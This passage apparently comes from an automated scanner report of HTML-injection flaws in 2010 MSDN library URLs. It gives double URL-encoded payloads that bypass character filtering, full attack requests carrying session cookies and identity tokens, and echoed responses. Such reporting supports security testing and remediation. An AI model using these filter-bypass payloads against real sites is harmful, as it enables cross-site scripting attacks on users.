<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library74342"><a>b95c098f3cf/dd582937(office.11" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1cf4%2522%253e%253ca%253ea00ac7dd75a was submitted in the REST URL parameter 3. This input was echoed as f1cf4"><a>a00ac7dd75a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582937(office.11f1cf4%2522%253e%253ca%253ea00ac7dd75a HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:25 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582937(office.11f1cf4"><a>a00ac7dd75a" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46aa7%2522%253e%253ca%253e2b28de78233 was submitted in the REST URL parameter 1. This input was echoed as 46aa7"><a>2b28de78233 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us46aa7%2522%253e%253ca%253e2b28de78233/library/dd582937(office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9221 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:14 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us46aa7"><a>2b28de78233/library/dd582937(office.11)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad5e%2522%253e%253ca%253e9e2edfb91df was submitted in the REST URL parameter 2. This input was echoed as 9ad5e"><a>9e2edfb91df in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library9ad5e%2522%253e%253ca%253e9e2edfb91df/dd582937(office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9221 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:24 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9ad5e"><a>9e2edfb91df/dd582937(office.11)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58dea%2522%253e%253ca%253e93ab1411cb5 was submitted in the REST URL parameter 3. This input was echoed as 58dea"><a>93ab1411cb5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582937(office.11).aspx58dea%2522%253e%253ca%253e93ab1411cb5 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9232 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:34 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582937(office.11).aspx58dea"><a>93ab1411cb5" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4846e%2522%253e%253ca%253ed113f5f9538 was submitted in the REST URL parameter 1. This input was echoed as 4846e"><a>d113f5f9538 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us4846e%2522%253e%253ca%253ed113f5f9538/library/dd582938(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:08 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us4846e"><a>d113f5f9538/library/dd582938(office.11" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4c1%2522%253e%253ca%253ea9f77ed350d was submitted in the REST URL parameter 2. This input was echoed as 6f4c1"><a>a9f77ed350d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library6f4c1%2522%253e%253ca%253ea9f77ed350d/dd582938(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 